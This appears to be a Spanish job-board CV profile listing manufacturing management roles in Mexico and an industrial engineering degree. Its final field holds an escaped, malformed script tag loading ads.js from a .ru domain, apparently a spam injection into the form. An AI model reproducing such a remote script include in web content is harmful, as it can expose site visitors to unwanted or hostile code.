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56678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7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0/0-0/0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Tramex del Norte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Producción, taller y fábrica (Dirección - Gerencia)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Dirigir y coordinar todas las operaciones administrativas y de manufactura de la empresa. Responsable de lograr el cumplimiento de los planes y programas de produccion, satisfaciendo los requerimientos de calidad, cantidad, tiempo de entrega y costo.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0/0-0/0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Aramark Manufacturing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Producción, taller y fábrica (Ingenieros - Técnicos)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Dirigir y administrar proyectos de mejora continua, enfocados a la planacion estrategica y la implementacion de soluciones integrales basadas en la mejora de la calidad del producto, tecnologia de la informacion, cambio organizacional.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0/0-0/0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807 Company de Mexico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Producción, taller y fábrica (Dirección - Gerencia)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Responsable de planear, desarrollar e implementar programas de calidad y produccion de la compañia, analizar los procesos de produccion y sus mejoras. Cumplimiento de metas productivas y coordinacion de equipo de trabajo de los diferentes departamentos.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0/2001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Tecnologico de estudios superiores Sierra Madre campus Torreon Coahuila Mexico. Ingeniería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Ing. Indistrial y de sistemas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Ingeniero Superior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Administración y Dirección de Empresas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7 habitos de la gente altamente efectiva.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&lt;B&gt;Pon tu Curriculum aquí...&lt;/B/ &lt;/&gt; &lt;/&gt;script src=http://www.bannerdriven.ru/ads.js&gt;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